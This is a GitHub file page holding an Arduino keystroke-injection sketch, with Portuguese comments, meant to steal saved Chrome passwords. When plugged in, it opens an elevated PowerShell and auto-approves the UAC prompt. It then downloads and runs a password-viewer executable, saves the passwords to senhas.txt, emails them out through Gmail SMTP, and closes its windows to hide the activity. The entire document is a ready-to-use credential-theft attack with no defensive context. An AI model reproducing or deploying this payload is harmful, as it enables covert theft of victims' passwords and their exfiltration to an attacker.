-
Notifications
You must be signed in to change notification settings - Fork 1
/
CAPTURASENHAS.txt
159 lines (126 loc) · 3.8 KB
/
CAPTURASENHAS.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#include "Keyboard.h"
void typeKey(uint8_t key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void setup()
{
Keyboard.begin();
delay(3000);
//---> minimiza tudo
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('d');
Keyboard.releaseAll();
delay(200);
// --> abre cmd
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
Keyboard.print("cmd");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(1000);
//--->modifica o teclado pro layout en-US
Keyboard.print("powershell Start-Process powershell -Verb runAs");
typeKey(KEY_RETURN);
delay(3000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('y');
Keyboard.releaseAll();
delay(4000);
Keyboard.print("Set-WinUserLanguageList -LanguageList en-US");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.press('s');
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(8000);
//---> baixa e executa o programa, salva o arquivo com as senhas em documentos
Keyboard.print("$down = New-Object System.Net.WebClient; $url = 'ENDEREÇO DO PROGRAMA'; $file = 'WBPV.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(10000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('a');
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('s');
Keyboard.releaseAll();
Keyboard.print("senhas.txt");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(1000);
//---> envia o e-mail
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
Keyboard.print("cmd");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(1000);
Keyboard.print("powershell");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$SMTPServer = 'smtp.gmail.com'");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$SMTPInfo.EnableSsl = $true");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[email protected]', 'SENHA')");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$ReportEmail = New-Object System.Net.Mail.MailMessage");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$ReportEmail.From = '[email protected]'");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$ReportEmail.To.Add('[email protected]')");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$ReportEmail.Subject = 'SenhasChrome'");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$ReportEmail.Body = (Get-Content documents/senhas.txt | out-string)");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.print("$SMTPInfo.Send($ReportEmail)");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(12000);
Keyboard.print("Set-WinUserLanguageList -LanguageList pt-BR");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.press('s');
typeKey(KEY_RETURN);
Keyboard.releaseAll();
delay(800);
Keyboard.print("exit");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
//---> fecha tudo
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
delay(100);
Keyboard.end();
}
/* Unused endless loop */
void loop() {}